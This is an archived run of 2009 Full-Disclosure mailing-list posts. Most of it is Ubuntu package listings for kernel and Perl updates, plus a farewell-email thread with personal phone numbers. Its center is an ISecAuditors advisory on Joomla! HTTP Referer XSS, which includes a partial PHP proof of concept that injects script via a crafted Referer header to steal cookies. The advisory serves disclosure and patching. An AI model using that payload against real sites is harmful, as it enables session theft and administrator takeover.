http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-generic_2.6.28-13.45_i386.deb Size/MD5: 668290 36fb94764dc7b473989ab048f6f8d18d http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-13-server_2.6.28-13.45_i386.deb Size/MD5: 669404 6dcdc4988b80b0d5fad7a49eec4b3f68 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-generic_2.6.28-13.45_i386.deb Size/MD5: 24584190 6d3e2aed50aed94ac91512384ae202a8 http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-server_2.6.28-13.45_i386.deb Size/MD5: 24662820 2f4ac0738424f2295bff2077238b126b http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.28-13-virtual_2.6.28-13.45_i386.deb Size/MD5: 10219490 e088239542d6b5caa4ba16b16c9ca5ce http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_i386.deb Size/MD5: 761048 a2f34260d40ebb215d26ed09a45e4fe1 http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 218044 3cfad485954208027c844fe40bc0b838 http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 174812 bf413e3a9b0cb7ab124f411ead7df97d http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 30068 22dfd9b4f06187b520b67d4855f7573f http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 262414 0e23c7445d3582011f9767101e4af06c http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 2007452 f84390b7d8d9f8b32c74823649b247aa http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 150198 05caa7db9bb38f7a42ec7ab0deb6ce47 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-shared-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 184298 45df2dcc24ab9a0ffc27da827f246206 http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 143542 5f862fc8f33fc1e4fbcabf78a733f1de http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 34572 92451114d002c65edb0d89d053a7037e http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 5502 f39f3f824fff9020a7fa80358fdfe7b9 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 85990 04a9436fc3c061a9feedf8a46b79a534 http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 47334 7134b0740644c5c266d52dc6d7524d68 http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 8712 cbd3f0e41be40915f413ac5802a6221e http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 44698 0cd8ea7ec39409e8563ab5c8c9e0248c http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 14740 c7287bd485367a228246ef8502f3d175 http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 1445196 81a9314640917265a536c3894ceed78a http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 44092 84aac7e95054a44fcfc589bce5129355 http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 69138 e79c9c942d7e02b83359cc1fe7fe6e6e http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 119512 ca6a4973ba663fe06f57b52c47b3fe5b http://security.ubuntu.com/ubuntu/pool/main/l/linux/virtio-modules-2.6.28-13-generic-di_2.6.28-13.45_i386.udeb Size/MD5: 12672 cff86af5ddbc47b6cc5dbf6892f7f3ad lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/l/linux/block-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 215242 34f3d0cfbebcc281bff8887d58a2fdd1 http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 46662 b60318e129f56b4f1ace761bfcbfeb8c http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 40950 aaa3fffb7bbd0ad7dbe1a49fd48d3cb0 http://ports.ubuntu.com/pool/main/l/linux/fb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 47292 4ca4fffc517a758eb5a9dc3dd69eb2c3 http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 86454 ba73d27d65487eed24ef32dade5dd6f3 http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 33270 96d878bfefd1667337a7d781624744fe http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 523424 3b0daef52c7fbc78f477a82d2885eedb http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 125172 ca7244bb0c9ea93bf1793fafc8d93249 http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 63536 a2ddb239393108fb7888391bdbcc0235 http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 300334 b0fe7216d15a908a78ef5eee547efef9 http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 3033028 ae4b9666c230f663aa490e5ef7915d3c http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.28-13-lpia_2.6.28-13.45_lpia.deb Size/MD5: 636848 685ad5fdd4837d0fc7670b40fdc55424 http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.28-13-lpia_2.6.28-13.45_lpia.deb Size/MD5: 21714272 d7a1bafe41d1f5aaf8c2b67a9171c5df http://ports.ubuntu.com/pool/main/l/linux/linux-libc-dev_2.6.28-13.45_lpia.deb Size/MD5: 761014 ebaf6b30ac3b8f5eeaa396e980eef83f http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 303684 5e037a0ca19df39904654a98a34a1bc6 http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 157340 00f6f5576c21231b566afa0e2cf8fd61 http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 24440 86b67b982ba9ca31546e0b2a21f0f864 http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 259984 8c79116a9aeb8b302834f8e1fc266955 http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 1925766 1212a0ff61f4eda2f650f309d08be026 http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 149320 40933fec799a654327e69f3e147f84d5 http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 184726 9c6154589bfc80b2dbddd2bcb84427de http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 143218 050db10728b271bdc222ec1af04581cb http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 34468 33f04ac2a7c747cace4c3cca47fc5c33 http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 5494 d974930a7f9c6808966eb8a90f7b6e09 http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 85642 67d356fdc7853f0e2080da162297ce7a http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 47256 d814aa4d377714470bd6acc6a5e310db http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 8708 97001eca3bfbeea54af2f8754beb6417 http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 63068 f7c2bd8e6e913ccebecc87873d9c5ce3 http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 14688 2bf1158a576fa810d85facf7bfd4b6d2 http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 1446758 b3a985a1ea798516afd4a7afd356a2e9 http://ports.ubuntu.com/pool/main/l/linux/serial-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 43890 c37408769b4cd3de313f21dd7c1ae220 http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 154914 2d14ce87eaa2b0f3ab967c818d87648b http://ports.ubuntu.com/pool/main/l/linux/usb-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 172600 716eff2706e585a3064c44ca8fae9ce9 http://ports.ubuntu.com/pool/main/l/linux/virtio-modules-2.6.28-13-lpia-di_2.6.28-13.45_lpia.udeb Size/MD5: 8158 3cac29e81c3e9d2a3d905761f572e74d -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20090701/6b3eeb87/attachment-0001.bin From tomb at byrneit.net Thu Jul 2 17:28:06 2009 From: tomb at byrneit.net (Tomas L. Byrnes) Date: Thu, 2 Jul 2009 09:28:06 -0700 Subject: [Full-disclosure] "So long, and thanks for all the fish!" In-Reply-To: References: <4A4C585A.7030202@losangelescomputerhelp.com> Message-ID: <70D072392E56884193E3D2DE09C097A91F4217@pascal.zaphodb.org> Looks like it's something "Green". His new email is @ engineecology.com. Hey, look on the bright side: the rush of cash chasers with no true understanding or love for computer tech that flooded the industry and wrecked it in the '90s are moving on to "green" tech. Now we'll have a smaller, but more competent, industry. Of course, we're also about to have the same massive misallocation of capital that happened in '95-'00; only to "green" stuff. Expect to see lots of "Green' businesses with business models as valid as "pets.com". >-----Original Message----- >From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure- >bounces at lists.grok.org.uk] On Behalf Of NOC >Sent: Thursday, July 02, 2009 12:26 AM >To: dan at losangelescomputerhelp.com >Cc: full-disclosure at lists.grok.org.uk >Subject: Re: [Full-disclosure] "So long, and thanks for all the fish!" > >Tell me the new service business is male prostitution o.0 > > >On 7/1/09 11:48 PM, "Daniel H. Renner" >wrote: > >> Hello, >> >> Please excuse the corny subject line, but it is my farewell speech, >and I >> couldn't help it... >> >> My apologies also if you received two copies of this note, as I wanted >to >> ensure that everyone did in fact get a copy. >> >> The purpose of this email is to notify you of my moving on from the >computer >> service business. >> >> I have recently come upon another service business opportunity that I >have a >> lot of interest in, and as a result have transferred your contact >information >> on to Jared, who has serviced most of you singly for the last 5 years, >and >> Bill Johonnesson who recently joined the company in order to help out >with the >> administrative end of things. >> >> Jared will continue to give you the same great service he always has, >and Bill >> will do a great job of keeping the administration of the business in >check and >> making sure that you are happy with your service. >> >> I have very much enjoyed servicing you in the computer field, and I am >very >> sure that you will receive -continued excellent service from Jared & >Bill. >> >> You can reach Jared and Bill at the same phone numbers you had for me >> (818-352-8700 & 818-400-4770) and for a short time via this email >address of >> dan at losangelescomputerhelp.com. >> >> If you have any personal communication you would like to send me, you >can >> email me at dan at engineecology.com. >> (The website is not up yet, but the email will work fine. If you are >> interested, please check in a couple of weeks.) >> >> My phone number has also changed to 818-808-6880. Again, this is for >personal >> contact at this time. All computer related questions should go to the >office >> numbers listed above. >> >> Thank you very much for your patronage, and my best wishes for your >future. >> >> >> Sincerely, >> Dan Renner >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> >> >> >> > > > >!DSPAM:1,4a4c6197113551287017954! > > >_______________________________________________ >Full-Disclosure - We believe in it. >Charter: http://lists.grok.org.uk/full-disclosure-charter.html >Hosted and sponsored by Secunia - http://secunia.com/ From advisories at isecauditors.com Thu Jul 2 16:13:50 2009 From: advisories at isecauditors.com (ISecAuditors Security Advisories) Date: Thu, 02 Jul 2009 17:13:50 +0200 Subject: [Full-disclosure] [ISecAuditors Security Advisories] Joomla! < 1.5.12 Multiple XSS vulnerabilities in HTTP Headers Message-ID: <4A4CCEAE.8010406@isecauditors.com> ============================================= INTERNET SECURITY AUDITORS ALERT 2009-007 - Original release date: June 30th, 2009 - Last revised: July 2nd, 2009 - Discovered by: Juan Galiana Lara - Severity: 6.8/10 (CVSS Base Score) ============================================= I. VULNERABILITY ------------------------- Joomla! < 1.5.12 Multiple XSS vulnerabilities in HTTP Headers II. BACKGROUND ------------------------- Joomla! is an award-winning content management system (CMS), which enables you to build Web sites and powerful online applications. Many aspects, including its ease-of-use and extensibility, have made Joomla! the most popular Web site software available. Best of all, Joomla! is an open source solution that is freely available to everyone. III. DESCRIPTION ------------------------- Joomla! fails to sanitized user supplied input. An attacker can inject JavaScript or DHTML code that will be executed in the context of targeted user browser, allowing him to steal cookies. HTTP headers are not properly parsed, concretly the HTTP_REFERER variable. Snippet of vulnerable code: Line 225 of file components/com_content/views/article/tmpl/form.php is vunerable. 221 222 223 224 225 226 227 228 Other parts of code may be affected: components/com_user/controller.php:86: $return = @$_SERVER['HTTP_REFERER']; plugins/system/legacy/html.php:246: echo ''. JText::_( 'BACK' ) .''; templates/beez/html/com_content/article/form.php:186: IV. PROOF OF CONCEPT ------------------------- An attacker can redirect the victim to a site with this script for executing javascript code in the victim's browser. The PoC creates a crafted HTTP request with malicious data in the HTTP_REFERER header. In order to succesfully exploit it, an account with any role is needed. For example, an user with any role can escalate privileges to administrator. headers[] = 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'; $this->headers[] = 'Connection: Keep-Alive'; $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8'; $this->headers[] = 'Referer: ">get('http://' . $site . $path . '/index.php?option=com_content&view=article&layout=form'); /* let's execute some javascript.. }:-)*/ echo $c; ?> V. BUSINESS IMPACT ------------------------- An attacker can exploit the vulnerability to inyect DHTML and JavaScript code in the context of the web browser. This may lead in steal the targeted user cookies and gain access to the user account icluding administrator privileges. VI. SYSTEMS AFFECTED ------------------------- Joomla! versions prior and including 1.5.11 are vulnerable. VII. SOLUTION ------------------------- Upgrade to version 1.5.12 VIII. REFERENCES ------------------------- http://www.joomla.org http://www.isecauditors.com IX. CREDITS ------------------------- This vulnerability has been discovered by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com). X. REVISION HISTORY ------------------------- June 30, 2009: Initial release. July 02, 2009: Last revision. XI. DISCLOSURE TIMELINE ------------------------- June 30, 2009: Discovered by Internet Security Auditors. June 30, 2009: Vendor contacted. Fast response. July 01, 2009: Joomla! publish update. Great job. July 02, 2009: Advisory published. XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Internet Security Auditors accepts no responsibility for any damage caused by the use or misuse of this information. From ShakedV at Radware.com Thu Jul 2 12:23:16 2009 From: ShakedV at Radware.com (Shaked Vax) Date: Thu, 2 Jul 2009 14:23:16 +0300 Subject: [Full-disclosure] radware AppWall Web Application Firewall: Source code disclosure on management interface Message-ID: <06DA44B99382B2428AD8DBFEE6CD209FAFD924@APOLLO.il.corp.radware.com> Radware team has completed analysis of the reported issue, concluding that no AppWall customer using the product according to Radware deployment recommendations would be exposed to vulnerability as a result of this issue. This is due to the facts that this issue exists only on the management interface that is recommended to be connection to internal LAN only, and that it does not allow performing any actions that would influence machine functionality. Nevertheless, in order to enforce our commitment to deliver top security solution to our customers, Radware will supply a fix for this issue within its upcoming AppWall release. Shaked Vax AppWall Product Manager ShakedV at radware.com From marc.deslauriers at canonical.com Thu Jul 2 19:27:30 2009 From: marc.deslauriers at canonical.com (Marc Deslauriers) Date: Thu, 02 Jul 2009 14:27:30 -0400 Subject: [Full-disclosure] [USN-794-1] Perl vulnerability Message-ID: <1246559250.6009.1.camel@mdlinux.technorage.com> =========================================================== Ubuntu Security Notice USN-794-1 July 02, 2009 libcompress-raw-zlib-perl, perl vulnerability CVE-2009-1391 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 8.04 LTS Ubuntu 8.10 Ubuntu 9.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 8.04 LTS: libcompress-raw-zlib-perl 2.008-1ubuntu0.1 Ubuntu 8.10: libcompress-raw-zlib-perl 2.011-2ubuntu0.1 perl 5.10.0-11.1ubuntu2.3 Ubuntu 9.04: libcompress-raw-zlib-perl 2.015-1ubuntu0.1 perl 5.10.0-19ubuntu1.1 In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: It was discovered that the Compress::Raw::Zlib Perl module incorrectly handled certain zlib compressed streams. If a user or automated system were tricked into processing a specially crafted compressed stream or file, a remote attacker could crash the application, leading to a denial of service. Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.008-1ubuntu0.1.diff.gz Size/MD5: 3407 fe826c6ae2a68f0db36c1cd7f2dba6f0 http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.008-1ubuntu0.1.dsc Size/MD5: 1159 6e45e1c85b78eecf636f88b182e24cc3 http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.008.orig.tar.gz Size/MD5: 207488 f1932364db75062ae40521f6b38ee41d amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.008-1ubuntu0.1_amd64.deb Size/MD5: 95618 d20e0c8b3fd09004fbc16928fbc23e18 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.008-1ubuntu0.1_i386.deb Size/MD5: 92026 4b3b19c028f333d9f2ae12aa2bc049d6 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.008-1ubuntu0.1_lpia.deb Size/MD5: 93552 51fcebc1e8e0e47c040c2ef8811e5a69 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.008-1ubuntu0.1_powerpc.deb Size/MD5: 97472 00a70b2125880fc1cd040c92259653a9 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.008-1ubuntu0.1_sparc.deb Size/MD5: 93322 759d55d24d12970d1466e915da10e181 Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.011-2ubuntu0.1.diff.gz Size/MD5: 3727 09f1a38aa7afb7f20872ad597164b175 http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.011-2ubuntu0.1.dsc Size/MD5: 1639 c7d90b5de85fcb020200664254a23cc7 http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.011.orig.tar.gz Size/MD5: 207842 15456e9a79e87996a9b79e575d513276 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.10.0-11.1ubuntu2.3.diff.gz Size/MD5: 113680 b14e8d55cd027caa9dbcff0def3fbe24 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.10.0-11.1ubuntu2.3.dsc Size/MD5: 1335 1d7fa4b3ebb057c09228ecd98b45a009 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.10.0.orig.tar.gz Size/MD5: 15595020 d2c39b002ebfd2c3c5dba589365c5a71 Architecture independent packages: http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-doc_5.10.0-11.1ubuntu2.3_all.deb Size/MD5: 8206674 19a9d3d0f044e38e2de6a16ae3d38418 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-modules_5.10.0-11.1ubuntu2.3_all.deb Size/MD5: 3272782 6a1c114b622c30b5719e3a1187d3c86d http://security.ubuntu.com/ubuntu/pool/universe/p/perl/libcgi-fast-perl_5.10.0-11.1ubuntu2.3_all.deb Size/MD5: 43306 9f27c2fc222e05af9fd65bde12615c2c amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.011-2ubuntu0.1_amd64.deb Size/MD5: 57876 adaed05a866851b97a4937b051693f5a http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.10.0-11.1ubuntu2.3_amd64.deb Size/MD5: 2609622 276b0f5606573fbbd392c69f9be4f757 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.10_5.10.0-11.1ubuntu2.3_amd64.deb Size/MD5: 1058 f39d83b6f9a72b89b8703479eaa313dc http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.10.0-11.1ubuntu2.3_amd64.deb Size/MD5: 946890 54a8af6cf7517c502f6ae7f4e304063a http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.10.0-11.1ubuntu2.3_amd64.deb Size/MD5: 5582552 3c23ce7e47b9fedb8087b15af193a0f8 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.10.0-11.1ubuntu2.3_amd64.deb Size/MD5: 31186 9bc0cab5ee6af6cf86792b3e7585b723 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.10.0-11.1ubuntu2.3_amd64.deb Size/MD5: 5223654 247455ba5ddbc8725dff257bf60aa6b7 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.011-2ubuntu0.1_i386.deb Size/MD5: 56176 301aef742069f0cd1ed7d1d73ede2110 http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl-dev_5.10.0-11.1ubuntu2.3_i386.deb Size/MD5: 2371224 ec9bb873961fc5644153886d9244887c http://security.ubuntu.com/ubuntu/pool/main/p/perl/libperl5.10_5.10.0-11.1ubuntu2.3_i386.deb Size/MD5: 627590 3656c5daa4fd420241ce9e052fe352c3 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-base_5.10.0-11.1ubuntu2.3_i386.deb Size/MD5: 874146 80a0db8e636250d54badb5e80358abec http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-debug_5.10.0-11.1ubuntu2.3_i386.deb Size/MD5: 6724876 4d779885d0dcc519807ae95b03840478 http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl-suid_5.10.0-11.1ubuntu2.3_i386.deb Size/MD5: 29426 13cbb4a8e7293c3d3d206684cc2a9fbe http://security.ubuntu.com/ubuntu/pool/main/p/perl/perl_5.10.0-11.1ubuntu2.3_i386.deb Size/MD5: 4539988 c860292ccc41abea964ce13609d6a11a lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.011-2ubuntu0.1_lpia.deb Size/MD5: 57116 819bfad6b3dc17a786c4482ce488d1cb http://ports.ubuntu.com/pool/main/p/perl/libperl-dev_5.10.0-11.1ubuntu2.3_lpia.deb Size/MD5: 2385518 9ec12a069ce760189722f48dde2fc9c7 http://ports.ubuntu.com/pool/main/p/perl/libperl5.10_5.10.0-11.1ubuntu2.3_lpia.deb Size/MD5: 1056 6bfe01c2bdcf34b3b26c2b3ee22cb1b1 http://ports.ubuntu.com/pool/main/p/perl/perl-base_5.10.0-11.1ubuntu2.3_lpia.deb Size/MD5: 902512 4fe6de798e4114acc06ad6cd4329a62f http://ports.ubuntu.com/pool/main/p/perl/perl-debug_5.10.0-11.1ubuntu2.3_lpia.deb Size/MD5: 5637398 c372c210f7efb7c54171e8771a6e7adf http://ports.ubuntu.com/pool/main/p/perl/perl-suid_5.10.0-11.1ubuntu2.3_lpia.deb Size/MD5: 29794 848c3b6d5ba0e370438592e4a4acb7a7 http://ports.ubuntu.com/pool/main/p/perl/perl_5.10.0-11.1ubuntu2.3_lpia.deb Size/MD5: 4552288 d25fe98b25081da77ba6dac665e2a0f0 powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.011-2ubuntu0.1_powerpc.deb Size/MD5: 60226 ba9a864d7584ac78b5e5580e55027e7f http://ports.ubuntu.com/pool/main/p/perl/libperl-dev_5.10.0-11.1ubuntu2.3_powerpc.deb Size/MD5: 2842592 eac747216597854f74d6c4154b7d1934 http://ports.ubuntu.com/pool/main/p/perl/libperl5.10_5.10.0-11.1ubuntu2.3_powerpc.deb Size/MD5: 1068 bb0250dea97575781e0b19842bc40e33 http://ports.ubuntu.com/pool/main/p/perl/perl-base_5.10.0-11.1ubuntu2.3_powerpc.deb Size/MD5: 956002 ec5bdc31d0aed9f1290b1a4ff412bc2a http://ports.ubuntu.com/pool/main/p/perl/perl-debug_5.10.0-11.1ubuntu2.3_powerpc.deb Size/MD5: 5906102 02c7329b4d1135cd1e16af9976ec8ca5 http://ports.ubuntu.com/pool/main/p/perl/perl-suid_5.10.0-11.1ubuntu2.3_powerpc.deb Size/MD5: 32504 35c4cccef3ab5fa116b0326f3ad10184 http://ports.ubuntu.com/pool/main/p/perl/perl_5.10.0-11.1ubuntu2.3_powerpc.deb Size/MD5: 4942022 004d60c0bb6440269d05679230d6c5ff sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.011-2ubuntu0.1_sparc.deb Size/MD5: 57916 98e95acd06170bd13661473867d71b9e http://ports.ubuntu.com/pool/main/p/perl/libperl-dev_5.10.0-11.1ubuntu2.3_sparc.deb Size/MD5: 2407870 c6623da5e69bad9d0a028374f48863f1 http://ports.ubuntu.com/pool/main/p/perl/libperl5.10_5.10.0-11.1ubuntu2.3_sparc.deb Size/MD5: 1056 64231502b7de25366ed88a8d75d48899 http://ports.ubuntu.com/pool/main/p/perl/perl-base_5.10.0-11.1ubuntu2.3_sparc.deb Size/MD5: 891406 a1282860010317e0d7734cb06ee25ac5 http://ports.ubuntu.com/pool/main/p/perl/perl-debug_5.10.0-11.1ubuntu2.3_sparc.deb Size/MD5: 5441760 060071f786bcd0254ae29be355e3fcdb http://ports.ubuntu.com/pool/main/p/perl/perl-suid_5.10.0-11.1ubuntu2.3_sparc.deb Size/MD5: 30408 fd9f4e0a21d44170395b2c9238f3dcbb http://ports.ubuntu.com/pool/main/p/perl/perl_5.10.0-11.1ubuntu2.3_sparc.deb Size/MD5: 4842184 feeb44a3ffe40c2482ee90dff41bd23a Updated packages for Ubuntu 9.04: Source archives: http://security.ubuntu.com/ubuntu/pool/main/libc/libcompress-raw-zlib-perl/libcompress-raw-zlib-perl_2.015-1ubuntu0.1.diff.gz Size/MD5: 3917 